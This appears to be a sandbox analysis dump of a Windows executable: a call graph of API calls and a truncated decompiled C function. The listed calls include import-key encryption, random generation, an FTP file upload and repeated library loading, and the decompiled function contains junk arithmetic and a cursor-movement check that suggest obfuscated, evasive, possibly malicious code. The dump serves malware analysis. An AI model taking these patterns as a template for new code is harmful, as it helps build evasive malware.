20835 42cabe 20834->20835 20838 42cac3 _strlen 20834->20838 20836 4259a7 44 API calls 20835->20836 20836->20838 20837 42a124 __XcptFilter 38 API calls 20839 42caf8 _strlen 20837->20839 20838->20837 20846 42cad1 20838->20846 20840 42cb47 20839->20840 20842 42a124 __XcptFilter 38 API calls 20839->20842 20843 42cb6d 20839->20843 20844 422aac __fltout2 38 API calls 20839->20844 20839->20846 20847 42cb84 20839->20847 20841 422804 __woutput_l 38 API calls 20840->20841 20841->20846 20842->20839 20845 422804 __woutput_l 38 API calls 20843->20845 20844->20839 20845->20846 20846->20760 20848 425114 __fltout2 10 API calls 20847->20848 20849 42cb90 20848->20849 20850 42e750 _parse_cmdline 40 API calls 20849->20850 20851 42cc1d 20849->20851 20850->20849 20852 42cd1b 20851->20852 20853 42e750 40 API calls _parse_cmdline 20851->20853 20852->20760 20853->20851 20856 424451 __except_handler3 20854->20856 21057 42893e 20856->21057 20857 42446f __initterm_e 20858 4249b3 48 API calls 20857->20858 20859 424490 __except_handler3 20857->20859 20858->20859 20859->20764 20861 42ca64 20860->20861 20863 42ca69 20860->20863 20862 4259a7 44 API calls 20861->20862 20862->20863 20864 42e750 _parse_cmdline 40 API calls 20863->20864 20865 424cff 20863->20865 20864->20863 20866 419d20 CoInitialize NtdllDefWindowProc_A 20865->20866 20867 419d5b 20866->20867 20868 418480 4 API calls 20867->20868 20869 419d79 GetCommandLineA 20868->20869 20870 419db0 CreateMenu 20869->20870 20872 419ecb LoadBitmapA AppendMenuA 20870->20872 20873 419f01 BeginDeferWindowPos 20872->20873 20874 419f22 CreateMetaFileA 20873->20874 20874->20874 20875 419f35 SetBrushOrgEx LoadImageA 20874->20875 20876 423911 49 API calls 20875->20876 20877 419f7e 20876->20877 20880 419fd1 FtpPutFileEx 20877->20880 20977 41c8fa 20877->20977 20878 423189 FindHandler 38 API calls 20879 41dbf0 20878->20879 20881 423991 FindHandler RaiseException 20879->20881 20883 41a038 GetSysColorBrush FrameRect 20880->20883 20882 41dc07 20881->20882 20885 
41a0a6 20883->20885 20886 41a0b3 GlobalAlloc GetLastError GetIconInfo GetIconInfo 20885->20886 20887 41a1fc setSBUpLow 20886->20887 20888 41a415 mmioSetInfo mmioAscend 20887->20888 20889 41a467 GetSystemInfo 20888->20889 20891 41a4da GetSystemTimeAsFileTime SetConsoleCtrlHandler 20889->20891 20892 41a56a CreateIoCompletionPort 20891->20892 20893 41a890 CopyImage 20892->20893 20895 41a950 20893->20895 20896 41aa1c DrawMenuBar FindResourceA 20895->20896 20897 41aa46 VirtualAlloc 20896->20897 20898 41aa72 setSBUpLow 20897->20898 20899 41aaa1 LoadLibraryA 20898->20899 20900 41aabc OleCreatePictureIndirect 20899->20900 20901 41aaf8 setSBUpLow 20900->20901 20902 41ab69 LoadLibraryA 20901->20902 20903 41ab78 setSBUpLow 20902->20903 20904 41ac21 LoadLibraryA 20903->20904 20905 41ac30 20904->20905 20906 422a18 ___crtGetStringTypeA 38 API calls 20905->20906 20907 41adfa 20906->20907 20908 41ae43 LoadLibraryA 20907->20908 20909 41ae4f OleCreatePictureIndirect 20908->20909 20910 41ae85 20909->20910 20911 422a18 ___crtGetStringTypeA 38 API calls 20910->20911 20912 41aee0 20911->20912 20913 41af40 LoadLibraryA 20912->20913 20914 41af58 OleCreatePictureIndirect 20913->20914 20915 41af8e 20914->20915 20916 422a18 ___crtGetStringTypeA 38 API calls 20915->20916 20917 41afe2 20916->20917 20918 41b0c0 LoadLibraryA 20917->20918 20919 41b0cc OleCreatePictureIndirect 20918->20919 20920 41b102 20919->20920 20921 422a18 ___crtGetStringTypeA 38 API calls 20920->20921 20922 41b227 setSBUpLow 20921->20922 20923 422a18 ___crtGetStringTypeA 38 API calls 20922->20923 20924 41b2b8 20923->20924 20925 422a18 ___crtGetStringTypeA 38 API calls 20924->20925 20926 41b361 setSBUpLow 20925->20926 20927 422a18 ___crtGetStringTypeA 38 API calls 20926->20927 20928 41b499 20927->20928 20929 41b4e2 LoadLibraryA LoadIconA OleCreatePictureIndirect 20928->20929 20930 41b52a setSBUpLow 20929->20930 20931 422a18 ___crtGetStringTypeA 38 API calls 20930->20931 20932 41b646 20931->20932 20933 41b6a6 LoadLibraryA 
20932->20933 20934 41b6be LoadLibraryA 20933->20934 20936 41b733 setSBUpLow 20934->20936 20937 422a18 ___crtGetStringTypeA 38 API calls 20936->20937 20938 41b891 setSBUpLow 20937->20938 20939 41b8fd LoadLibraryA 20938->20939 20940 41b916 OleCreatePictureIndirect 20939->20940 20941 41b94b LoadLibraryA LoadIconA OleCreatePictureIndirect 20940->20941 20943 41ba1f 20941->20943 20944 422a18 ___crtGetStringTypeA 38 API calls 20943->20944 20945 41ba8d setSBUpLow 20944->20945 20946 422a18 ___crtGetStringTypeA 38 API calls 20945->20946 20947 41bb3a 20946->20947 20948 41bb87 LoadLibraryA LoadIconA OleCreatePictureIndirect 20947->20948 20949 41bbd1 setSBUpLow 20948->20949 20950 422a18 ___crtGetStringTypeA 38 API calls 20949->20950 20951 41bf0f setSBUpLow 20950->20951 20952 422a18 ___crtGetStringTypeA 38 API calls 20951->20952 20953 41bfa4 20952->20953 20954 41c07f LoadLibraryA LoadIconA OleCreatePictureIndirect 20953->20954 20955 41c0cb 20954->20955 20956 422a18 ___crtGetStringTypeA 38 API calls 20955->20956 20957 41c13c 20956->20957 20958 422a18 ___crtGetStringTypeA 38 API calls 20957->20958 20959 41c27a 20958->20959 20960 41c2a6 LoadLibraryA 20959->20960 20961 41c2b8 OleCreatePictureIndirect 20960->20961 20962 41c2ee setSBUpLow 20961->20962 20963 422a18 ___crtGetStringTypeA 38 API calls 20962->20963 20964 41c385 20963->20964 20965 41c3b1 LoadLibraryA 20964->20965 20966 41c3bd OleCreatePictureIndirect 20965->20966 20967 41c3f3 setSBUpLow 20966->20967 20968 41c5b8 LoadLibraryA LoadIconA OleCreatePictureIndirect 20967->20968 20969 41c602 20968->20969 20970 422a18 ___crtGetStringTypeA 38 API calls 20969->20970 20971 41c670 setSBUpLow 20970->20971 20972 41c6de LoadLibraryA LoadIconA OleCreatePictureIndirect 20971->20972 20973 41c728 setSBUpLow 20972->20973 20974 422a18 ___crtGetStringTypeA 38 API calls 20973->20974 20975 41c86b 20974->20975 20976 41c8b4 LoadLibraryA LoadIconA OleCreatePictureIndirect 20975->20976 20976->20977 20977->20878 20979 424be6 20978->20979 20980 424beb 
20978->20980 20981 426517 __amsg_exit 38 API calls 20979->20981 20982 426368 __amsg_exit 38 API calls 20980->20982 20981->20980 20983 424bf3 20982->20983 20984 4243c2 ___crtGetStringTypeA 3 API calls 20983->20984 20985 424bfd 20984->20985 20985->20744 21002 425cfe RtlEncodePointer 20986->21002 20988 4243f4 21003 42af49 RtlEncodePointer 20988->21003 20990 42441a RtlEncodePointer RtlEncodePointer RtlEncodePointer RtlEncodePointer 20991 42bf11 20990->20991 20992 42bf1c 20991->20992 20993 42bf26 InitializeCriticalSectionAndSpinCount 20992->20993 20994 4261ac 20992->20994 20993->20992 20993->20994 20994->20789 20994->20790 20996 425d8b RtlDecodePointer 20995->20996 20997 425d9a 20995->20997 20996->20997 20998 425dab TlsFree 20997->20998 20999 425db9 20997->20999 20998->20999 21000 4260bb 20999->21000 21001 422804 __woutput_l 38 API calls 20999->21001 21000->20745 21001->20999 21002->20988 21003->20990 21005 42cbb0 21004->21005 21009 42cc1d 21005->21009 21014 42e750 21005->21014 21007 42cd1b 21007->20830 21007->20833 21008 42e750 40 API calls _parse_cmdline 21008->21009 21009->21007 21009->21008 21011 4259b0 21010->21011 21012 4259b7 21010->21012 21020 42580d 21011->21020 21012->20824 21017 42e6e4 21014->21017 21018 42224b ___crtLCMapStringA 40 API calls 21017->21018 21019 42e6f7 21018->21019 21019->21005 21021 425819 __control87 21020->21021 21022 425eeb __getptd 38 API calls 21021->21022 21023 425822 21022->21023 21024 425504 ___crtLCMapStringA 40 API calls 21023->21024 21025 42582c 21024->21025 21046 4255a8 21025->21046 21028 42a0df __getbuf 38 API calls 21029 42584d 21028->21029 21030 42596c __control87 21029->21030 21031 42587d InterlockedDecrement 21029->21031 21032 425979 21029->21032 21030->21012 21034 42588d 21031->21034 21038 42589d 21031->21038 21032->21030 21033 42598c 21032->21033 21035 422804 __woutput_l 38 API calls 21032->21035 21036 4251b8 __woutput_l 38 API calls 21033->21036 21037 422804 __woutput_l 38 API calls 21034->21037 21034->21038 21035->21033 
21036->21030 21037->21038 21038->21030 21039 42c08b __XcptFilter 38 API calls 21038->21039 21040 4258c8 InterlockedDecrement 21039->21040 21042 425956 21040->21042 21043 425944 21040->21043 21053 42596e 21042->21053 21043->21042 21044 422804 __woutput_l 38 API calls 21043->21044 21044->21042 21047 42224b ___crtLCMapStringA 40 API calls 21046->21047 21048 4255bc 21047->21048 21049 4255c7 GetOEMCP 21048->21049 21050 4255e5 21048->21050 21052 4255d7 21049->21052 21051 4255ea GetACP 21050->21051 21050->21052 21051->21052 21052->21028 21052->21030 21056 42bfb2 RtlLeaveCriticalSection 21053->21056 21055 425975 21055->21030 21056->21055 21058 428944 RtlEncodePointer 21057->21058 21058->21058 21059 42895e 21058->21059 21059->20857 21406 405d1c 21407 405d38 21406->21407 21438 406102 21406->21438 21407->21438 21474 4054b8 21407->21474 21412 405858 3 API calls 21413 405dfe 21412->21413 21487 4017e8 21413->21487 21423 405eaf 21424 4060b0 21423->21424 21425 406056 21423->21425 21521 4013dc GetProcessHeap RtlAllocateHeap 21424->21521 21502 405894 21425->21502 21428 4060ae 21433 4060fa 21428->21433 21434 406107 21428->21434 21431 40607a 21432 405894 6 API calls 21431->21432 21432->21428 21522 401440 GetProcessHeap HeapFree 21433->21522 21523 401440 GetProcessHeap HeapFree 21434->21523 21437 40610f 21437->21438 21524 4013dc GetProcessHeap RtlAllocateHeap 21437->21524 21440 40614f 21440->21438 21441 4061c5 21440->21441 21525 401460 GetProcessHeap RtlReAllocateHeap 21440->21525 21442 4061d8 21441->21442 21443 4061cb 21441->21443 21527 4013dc GetProcessHeap RtlAllocateHeap 21442->21527 21526 401440 GetProcessHeap HeapFree 21443->21526 21447 4061e1 21528 4059bc 21447->21528 21450 4017e8 CryptAcquireContextA 21451 406222 21450->21451 21542 401374 21451->21542 21456 401404 CryptHashData 21457 406261 21456->21457 21458 401404 CryptHashData 21457->21458 21459 40627e 21458->21459 21460 401404 CryptHashData 21459->21460 21461 406292 21460->21461 21548 401490 21461->21548 21466 401b20 
CryptReleaseContext 21467 4062c4 21466->21467 21468 4062db 21467->21468 21469 4062fd 21467->21469 21554 401440 GetProcessHeap HeapFree 21468->21554 21556 401440 GetProcessHeap HeapFree 21469->21556 21472 4062e3 21555 401440 GetProcessHeap HeapFree 21472->21555 21476 4054cb 21474->21476 21475 40560f 21480 405858 21475->21480 21478 405567 21476->21478 21557 401844 wsprintfA 21476->21557 21478->21475 21558 401844 wsprintfA 21478->21558 21481 4017e8 CryptAcquireContextA 21480->21481 21482 405877 21481->21482 21559 40153c 21482->21559 21485 401b20 CryptReleaseContext 21486 40588f 21485->21486 21486->21412 21488 40181e 21487->21488 21489 401801 CryptAcquireContextA 21487->21489 21490 4018a0 21488->21490 21489->21488 21491 4018da 21490->21491 21492 4018b9 CryptImportKey 21490->21492 21493 401ab0 21491->21493 21492->21491 21494 401aee 21493->21494 21495 401ac9 CryptEncrypt 21493->21495 21496 401af8 21494->21496 21495->21494 21497 401b0b CryptDestroyKey 21496->21497 21498 401b18 21496->21498 21497->21498 21499 401b20 21498->21499 21500 401b47 21499->21500 21501 401b36 CryptReleaseContext 21499->21501 21500->21423 21501->21500 21503 4017e8 CryptAcquireContextA 21502->21503 21504 4058bb 21503->21504 21505 4018a0 CryptImportKey 21504->21505 21506 405904 21505->21506 21562 401574 21506->21562 21509 401574 CryptSetKeyParam 21510 405936 21509->21510 21511 405945 21510->21511 21512 405960 21510->21512 21513 401ab0 CryptEncrypt 21511->21513 21515 401ab0 CryptEncrypt 21512->21515 21514 40595e 21513->21514 21516 401af8 CryptDestroyKey 21514->21516 21515->21514 21517 4059a9 21516->21517 21518 401b20 CryptReleaseContext 21517->21518 21519 4059b3 21518->21519 21520 4013dc GetProcessHeap RtlAllocateHeap 21519->21520 21520->21431 21521->21428 21522->21438 21523->21437 21524->21440 21525->21440 21526->21438 21527->21447 21529 4059e3 21528->21529 21530 4059d6 21528->21530 21529->21530 21531 4017e8 CryptAcquireContextA 21529->21531 21530->21450 21532 405a0f 21531->21532 21533 4018a0 
CryptImportKey 21532->21533 21534 405a58 21533->21534 21535 401574 CryptSetKeyParam 21534->21535 21536 405a71 21535->21536 21565 4017a4 21536->21565 21538 401af8 CryptDestroyKey 21540 405ad2 21538->21540 21539 405a9c 21539->21538 21541 401b20 CryptReleaseContext 21540->21541 21541->21530 21543 4013aa 21542->21543 21544 40138d CryptCreateHash 21542->21544 21545 401404 21543->21545 21544->21543 21546 401436 21545->21546 21547 40141d CryptHashData 21545->21547 21546->21456 21547->21546 21549 4014a9 CryptGetHashParam 21548->21549 21550 4014c6 21548->21550 21549->21550 21551 4014d0 21550->21551 21552 4014e3 CryptDestroyHash 21551->21552 21553 4014f0 21551->21553 21552->21553 21553->21466 21554->21472 21555->21438 21556->21438 21557->21476 21558->21478 21560 401555 CryptGenRandom 21559->21560 21561 40156a 21559->21561 21560->21561 21561->21485 21563 40158d CryptSetKeyParam 21562->21563 21564 4015a6 21562->21564 21563->21564 21564->21509 21566 4017de 21565->21566 21567 4017bd CryptDecrypt 21565->21567 21566->21539 21567->21566 21572 42a355 21573 42a303 __CallSettingFrame@12 21572->21573 21574 42a36a 21573->21574 21580 42af11 21573->21580 21586 42a38f 21574->21586 21578 42af11 _GetRangeOfTrysToCheck 41 API calls 21579 42a380 __control87 21578->21579 21591 429ef0 21580->21591 21582 42af1d RtlDecodePointer 21585 42af2d 21582->21585 21592 42aec5 21585->21592 21587 425eeb __getptd 38 API calls 21586->21587 21588 42a394 21587->21588 21589 42a376 21588->21589 21590 425eeb __getptd 38 API calls 21588->21590 21589->21578 21589->21579 21590->21589 21591->21582 21593 42aed1 __control87 21592->21593 21594 425eeb __getptd 38 API calls 21593->21594 21595 42aed6 21594->21595 21598 4262ee 21595->21598 21607 42c113 RtlDecodePointer 21598->21607 21600 4262f3 21602 4262fe 21600->21602 21608 42c120 21600->21608 21605 426316 21602->21605 21629 424feb 21602->21629 21604 424630 __amsg_exit 38 API calls 21606 426320 21604->21606 21605->21604 21607->21600 21609 42c12c __control87 21608->21609 

    Executed Functions

    C-Code - Quality: 58%
    			E0041C95B(void* __eax, void* __edi, void* __eflags, signed long long __fp0) {
    				void* _t469;
    				void* _t481;
    				struct HINSTANCE__* _t482;
    				struct HICON__* _t483;
    				struct HINSTANCE__* _t489;
    				struct HICON__* _t490;
    				signed short _t496;
    				void* _t498;
    				signed int _t506;
    				signed int _t512;
    				CHAR* _t523;
    				int _t525;
    				int _t539;
    				void* _t540;
    				int _t541;
    				int _t542;
    				int _t544;
    				long _t548;
    				void* _t554;
    				signed char _t556;
    				void* _t580;
    				struct tagPOINT _t594;
    				CHAR* _t601;
    				void* _t614;
    				long _t616;
    				void* _t620;
    				CHAR* _t622;
    				CHAR* _t625;
    				CHAR* _t628;
    				CHAR* _t629;
    				CHAR* _t635;
    				struct _SECURITY_ATTRIBUTES* _t636;
    				CHAR* _t638;
    				struct _SECURITY_ATTRIBUTES* _t639;
    				CHAR* _t641;
    				CHAR* _t643;
    				intOrPtr* _t644;
    				long _t646;
    				struct _SECURITY_ATTRIBUTES* _t648;
    				int _t651;
    				struct HWND__* _t652;
    				struct _SECURITY_ATTRIBUTES* _t661;
    				CHAR* _t662;
    				CHAR* _t663;
    				CHAR* _t664;
    				CHAR* _t668;
    				struct _SECURITY_ATTRIBUTES* _t669;
    				CHAR* _t671;
    				struct _SECURITY_ATTRIBUTES* _t672;
    				intOrPtr* _t674;
    				CHAR* _t675;
    				intOrPtr* _t676;
    				long _t678;
    				intOrPtr* _t681;
    				struct _SECURITY_ATTRIBUTES* _t683;
    				struct _SECURITY_ATTRIBUTES* _t686;
    				signed char _t702;
    				signed int _t738;
    				CHAR* _t763;
    				intOrPtr* _t768;
    				intOrPtr* _t773;
    				intOrPtr _t776;
    				intOrPtr _t779;
    				void* _t780;
    				intOrPtr* _t781;
    				CHAR* _t782;
    				intOrPtr _t785;
    				struct HINSTANCE__* _t786;
    				signed int _t787;
    				CHAR* _t788;
    				struct tagPOINT _t790;
    				struct HMENU__* _t791;
    				signed short _t810;
    				CHAR* _t824;
    				signed int _t837;
    				CHAR* _t853;
    				CHAR* _t859;
    				struct _SECURITY_ATTRIBUTES* _t861;
    				signed char _t902;
    				signed int _t904;
    				CHAR* _t905;
    				CHAR* _t909;
    				CHAR* _t910;
    				short _t934;
    				struct HWND__* _t945;
    				CHAR* _t954;
    				CHAR* _t971;
    				signed int _t1037;
    				intOrPtr _t1039;
    				intOrPtr _t1040;
    				struct HDC__* _t1041;
    				intOrPtr* _t1042;
    				signed int _t1043;
    				long _t1044;
    				signed int _t1045;
    				int _t1046;
    				intOrPtr* _t1049;
    				void* _t1051;
    				intOrPtr _t1054;
    				intOrPtr _t1055;
    				intOrPtr _t1057;
    				signed int _t1058;
    				void* _t1059;
    				void* _t1060;
    				void* _t1062;
    				intOrPtr _t1063;
    				signed short _t1064;
    				CHAR* _t1065;
    				struct HWND__* _t1067;
    				CHAR* _t1068;
    				void* _t1069;
    				intOrPtr* _t1071;
    				CHAR* _t1072;
    				intOrPtr _t1075;
    				void* _t1076;
    				intOrPtr* _t1081;
    				struct HWND__* _t1084;
    				signed short _t1087;
    				struct _SECURITY_ATTRIBUTES* _t1092;
    				intOrPtr* _t1096;
    				void* _t1097;
    				void* _t1098;
    				void* _t1099;
    				void* _t1100;
    				void* _t1101;
    				void* _t1102;
    				intOrPtr* _t1103;
    				void* _t1104;
    				void* _t1105;
    				int _t1112;
    				CHAR* _t1122;
    				signed short _t1158;
    				signed long long _t1181;
    
    				_t1181 = __fp0;
    				_t1036 = __edi;
    				_t928 =  *(_t1097 + 0xa0) & 0x0000ffff;
    				_t780 = __eax - ( *(_t1097 + 0xa0) & 0x0000ffff);
    				_push(_t1097 + 0x1c);
    				_push(_t1097 + 0x14);
    				_push(0);
    				_push(0);
    				_push(2);
    				_push(0);
    				_push(2); // executed
    				L00421DD8(); // executed
    				_t1054 =  *((intOrPtr*)(_t1097 + 0x10));
    				_t469 = E00422A18(_t928, __edi, _t1054, _t1054);
    				_t1098 = _t1097 + 4;
    				_push(_t1098 + 0x20);
    				_push(_t1098 + 0x20);
    				_push(_t1054);
    				_push(_t469);
    				_push(2);
    				_push(0);
    				_push(2); // executed
    				L00421DD8(); // executed
    				if(_t469 != 0) {
    					_t779 =  *((intOrPtr*)(_t1098 + 0x20));
    					if(_t779 != 0) {
    						 *0x442a94 =  *0x442a94 + _t779;
    					}
    				}
    				if(_t780 == 0) {
    					 *0x442a98 =  *0x442a98 + ( *(_t1098 + 0x14) & 0x0000ffff) - ( *0x442a94 & 0x0000ffff) + ( *0x442a94 & 0x0000ffff);
    					_t1112 =  *0x442a98;
    				}
    				L0042240E(_t1036, _t1054, _t1112); // executed
    				L0042240E(_t1036, _t1054, _t1112,  ~(0 | _t1112 > 0x00000000) | 0x3200,  ~(0 | _t1112 > 0x00000000) | 0x3200); // executed
    				L0042240E(_t1036, _t1054, _t1112);
    				L0042240E(_t1036, _t1054, _t1112, 0x12c0, 0x12c0); // executed
    				_t1099 = _t1098 + 0x10;
    				_push(3);
    				_push(1);
    				_push(1);
    				_push(_t1099 + 0x30);
    				 *(_t1099 + 0x34) = 1;
    				 *((intOrPtr*)(_t1099 + 0x38)) = "Profile";
    				 *(_t1099 + 0x3c) = 8;
    				L00432D0E(); // executed
    				_push(3);
    				_push(1);
    				_push(1);
    				_push(_t1099 + 0x30);
    				 *((intOrPtr*)(_t1099 + 0x38)) = 0x43583c;
    				 *(_t1099 + 0x3c) = 5;
    				L00432D0E();
    				_t934 =  *0x442aa0; // 0x0
    				 *((short*)(_t1099 + 0x1b0)) = _t934;
    				E00422840(_t1099 + 0x1aa, 0, 0x1fe);
    				_t1100 = _t1099 + 0xc;
    				_push(_t1100 + 0x1c);
    				_push(_t1100 + 0x14);
    				_push(0);
    				_push(0);
    				_push(2);
    				_push(0);
    				_push(2); // executed
    				L00421DD8(); // executed
    				_t1055 =  *((intOrPtr*)(_t1100 + 0x10));
    				_t481 = E00422A18(_t1100 + 0x14, _t1036, _t1055, _t1055); // executed
    				_t1101 = _t1100 + 4;
    				_push(_t1101 + 0x20);
    				_push(_t1101 + 0x20);
    				_push(_t1055);
    				_push(_t481);
    				_push(2);
    				_push(0);
    				_push(2); // executed
    				L00421DD8(); // executed
    				if(_t481 != 0) {
    					_t776 =  *((intOrPtr*)(_t1101 + 0x20));
    					if(_t776 != 0) {
    						 *0x442a94 =  *0x442a94 + _t776;
    					}
    				}
    				_t482 = LoadLibraryA("open"); // executed
    				_t483 = LoadIconA(_t482, 0x64);
    				_t781 =  *0x433300;
    				 *(_t1101 + 0x40) = _t483;
    				 *((intOrPtr*)(_t1101 + 0x48)) = 0x14;
    				 *(_t1101 + 0x4c) = 3;
    				 *_t781(_t1101 + 0x44, _t1101 + 0x5c, 1, _t1101 + 0x10);
    				 *_t1081(0, 1, _t1101 + 0x18);
    				if( *0x442aa8 != 0) {
    					_t773 =  *((intOrPtr*)(_t1101 + 0x10));
    					 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 0x3c))))(_t773,  *((intOrPtr*)(_t1101 + 0x1c)), 1, _t1101 + 0x70);
    				}
    				 *0x4335ec( *((intOrPtr*)(_t1101 + 0x18)), _t1101 + 0x7c);
    				if( *(_t1101 + 0x14) == 0) {
    					 *0x442a98 =  *0x442a98 + ( *(_t1101 + 0x14) & 0x0000ffff) - ( *0x442a94 & 0x0000ffff) + ( *0x442a94 & 0x0000ffff);
    				}
    				_t489 = LoadLibraryA("open"); // executed
    				_t490 = LoadIconA(_t489, 0x64);
    				 *(_t1101 + 0x44) = _t490;
    				 *((intOrPtr*)(_t1101 + 0x48)) = 0x14;
    				 *(_t1101 + 0x4c) = 3;
    				 *_t781(_t1101 + 0x44, _t1101 + 0x5c, 1, _t1101 + 0x10);
    				 *_t1081(0, 1, _t1101 + 0x18);
    				if( *0x442aa8 != 0) {
    					_t768 =  *((intOrPtr*)(_t1101 + 0x10));
    					 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 0x3c))))(_t768,  *((intOrPtr*)(_t1101 + 0x1c)), 1, _t1101 + 0x70);
    				}
    				 *0x4335ec( *((intOrPtr*)(_t1101 + 0x18)), _t1101 + 0x7c);
    				_t810 =  *0x442a94; // 0x0
    				if( *(_t1101 + 0x14) == 0) {
    					 *0x442a98 =  *0x442a98 + ( *(_t1101 + 0x14) & 0x0000ffff) - (_t810 & 0x0000ffff) + (_t810 & 0x0000ffff);
    				}
    				 *((intOrPtr*)(_t1101 + 0x5c)) = 0;
    				 *((intOrPtr*)(_t1101 + 0x60)) = 0;
    				_t1122 =  *0x442aa0; // 0x0
    				if(_t1122 != 0) {
    					_t496 =  *(_t1101 + 0x14);
    				} else {
    					_t496 = 0 - ( *(_t1101 + 0xa0) & 0x0000ffff);
    				}
    				if(_t496 == 0) {
    					 *0x442a98 =  *0x442a98 + ( *(_t1101 + 0x14) & 0x0000ffff) - (_t810 & 0x0000ffff) + (_t810 & 0x0000ffff);
    				}
    				_push(_t1101 + 0x1c);
    				_push(_t1101 + 0x14);
    				_push(0);
    				_push(0);
    				_push(2);
    				_push(0);
    				_push(2); // executed
    				L00421DD8(); // executed
    				_t1057 =  *((intOrPtr*)(_t1101 + 0x10));
    				_t498 = E00422A18(_t1101 + 0x1c, _t1036, _t1057, _t1057);
    				_t1102 = _t1101 + 4;
    				_push(_t1102 + 0x20);
    				_push(_t1102 + 0x20);
    				_push(_t1057);
    				_push(_t498);
    				_push(2);
    				_push(0);
    				_push(2); // executed
    				L00421DD8(); // executed
    				if(_t498 != 0) {
    					_t763 =  *(_t1102 + 0x20);
    					if(_t763 != 0) {
    						 *0x442a94 =  &(_t763[ *0x442a94]);
    					}
    				}
    				 *(_t1102 + 0x4c) =  *(_t1102 + 0x8c8);
    				 *((intOrPtr*)(_t1102 + 0x44)) = 0;
    				 *(_t1102 + 0xb4) = 0;
    				 *((intOrPtr*)(_t1102 + 0xb8)) = 0;
    				 *(_t1102 + 0xbc) = 0;
    				 *((intOrPtr*)(_t1102 + 0x7c)) =  *((intOrPtr*)(_t1102 + 0x8bc));
    				asm("cdq");
    				 *(_t1102 + 0x3c) = 0;
    				_t1037 = 0;
    				_t1058 = 0;
    				_t782 = 1;
    				 *(_t1102 + 0x1c) = 0x59;
    				_t1084 =  *(_t1102 + 0x1c);
    				 *(_t1102 + 0xd8) = 0;
    				 *(_t1102 + 0x20) = 1;
    				 *((intOrPtr*)(_t1102 + 0x5c)) = 0;
    				 *(_t1102 + 0x10) = 0 / ( *(_t1102 + 0x68) + 0x4e) * 0;
    				do {
    					GetDC(0);
    					_t1084 = _t1084 - 1;
    				} while (_t1084 != 0);
    				 *((intOrPtr*)(_t1102 + 0x78)) = CreateEventA(_t1084, _t1084, _t1084, "Xstore");
    				 *(_t1102 + 0x58) = _t1084;
    				 *(_t1102 + 0x20) = _t1084;
    				 *(_t1102 + 0x24) = 0xa;
    				 *(_t1102 + 0x2c) = _t1084;
    				 *(_t1102 + 0x30) = _t1084;
    				 *(_t1102 + 0xcc) = _t1084;
    				 *(_t1102 + 0xd0) = _t1084;
    				_t506 = GetClassLongA(_t1084, 0xffffffe6);
    				_t945 =  *0x442aa8; // 0x0
    				SetClassLongA(_t945, 0xffffffe6, _t506 | 0x00000200);
    				GetCursorPos(_t1102 + 0x24);
    				while(1) {
    					 *(_t1102 + 0x4c) =  *(_t1102 + 0x4c) +  *((intOrPtr*)(_t1102 + 0x7ad)) -  *0x442a98;
    					GetCursorPos(_t1102 + 0xc4);
    					_t512 =  *0x442aac; // 0x0
    					_t1087 =  *(_t1102 + 0x68) - _t512 *  *0x442a98 + 1;
    					 *(_t1102 + 0xe8) = 0;
    					 *0x4335e8(0, 0, _t1102 + 0xdc);
    					if( *(_t1102 + 0x24) !=  *(_t1102 + 0xc4) ||  *(_t1102 + 0x28) !=  *(_t1102 + 0xc8)) {
    						__eflags =  *(_t1102 + 0x6c);
    						if( *(_t1102 + 0x6c) == 0) {
    							_t523 = (((0xb60b60b7 *  *(_t1102 + 0x68) >> 0x20) +  *(_t1102 + 0x68) >> 6 >> 0x1f) + ((0xb60b60b7 *  *(_t1102 + 0x68) >> 0x20) +  *(_t1102 + 0x68) >> 6)) * _t1037 - ( *0x442aac & 0x0000ffff) - _t1058 -  *(_t1102 + 0x4c);
    							__eflags = _t523;
    							 *(_t1102 + 0x10) =  &(_t523[( *0x442a94 & 0x0000ffff) + 0x2c]);
    							_t525 =  *0x442a98; // 0x0
    						} else {
    							_t525 =  *(_t1102 + 0xd8) *  *0x442a98 -  *(_t1102 + 0x68);
    							 *0x442a98 = _t525;
    						}
    						 *(_t1102 + 0x24) =  *(_t1102 + 0xc4);
    						 *(_t1102 + 0x28) =  *(_t1102 + 0xc8);
    						__eflags = _t525 - ( *(_t1102 + 0x88) & 0x000000ff) +  *(_t1102 + 0x6c) - (_t782 & 0x000000ff);
    						if(_t525 - ( *(_t1102 + 0x88) & 0x000000ff) +  *(_t1102 + 0x6c) > (_t782 & 0x000000ff)) {
    							_t1087 = _t1087 +  *0x442a94;
    							__eflags = _t1087;
    						}
    						_t155 = _t1102 + 0x50;
    						 *_t155 =  &(( *(_t1102 + 0x50))[1]);
    						__eflags =  *_t155;
    					} else {
    						_t1058 = 0x175b75a - _t782 +  *(_t1102 + 0x3c);
    						 *(_t1102 + 0xdc) = ( *0x442a94 & 0x0000ffff) * _t1058 *  *(_t1102 + 0x34);
    						_t1037 = 0x175b75a;
    						 *(_t1102 + 0xd8) =  *(_t1102 + 0xd8) -  *(_t1102 + 0xdc) + ((_t782 * _t1087 - (0x86186187 * _t782 * _t1087 >> 0x20) >> 1) + (0x86186187 * _t782 * _t1087 >> 0x20) >> 4);
    						CommDlgExtendedError();
    						_t782 =  *(_t1102 + 0x20);
    					}
    					if(0 != 0) {
    						_t158 = _t1102 + 0x3c;
    						 *_t158 =  &(( *(_t1102 + 0x3c))[ *(_t1102 + 0x90) & 0x0000ffff]);
    						__eflags =  *_t158;
    					} else {
    						_t1037 = _t1037;
    					}
    					_t954 =  *(_t1102 + 0x50);
    					_t824 =  *0x442aa0; // 0x0
    					if(_t954 != 0) {
    						if( *((intOrPtr*)(_t1102 + 0x7c)) > _t824) {
    							_t163 = _t1102 + 0xbc;
    							 *_t163 =  *(_t1102 + 0xbc) - _t1058;
    							__eflags =  *_t163;
    						} else {
    							 *(_t1102 + 0xb4) =  ~0x00000000;
    						}
    						 *((intOrPtr*)(_t1102 + 0x18)) =  *((intOrPtr*)(_t1102 + 0x18)) + 1;
    					}
    					if(_t954 > 1) {
    						break;
    					}
    					if(_t1102 + 0x1a4 != 0) {
    						_t782 =  &(_t782[0x76d - (0xba2e8ba3 *  *(_t1102 + 0xd8) >> 0x20 >> 5)]);
    						__eflags = _t782;
    						 *(_t1102 + 0x20) = _t782;
    					} else {
    						 *0x442a94 =  *0x442a94 +  *(_t1102 + 0x4c) *  *0x442aac * (_t1102 + 0x6b0);
    					}
    					if( *((intOrPtr*)(_t1102 + 0x18)) == 5 - _t824) {
    						__eflags =  *0x442aa4;
    						if(__eflags == 0) {
    							_t782 =  &(_t782[_t824]);
    							__eflags = _t782;
    						}
    						break;
    					} else {
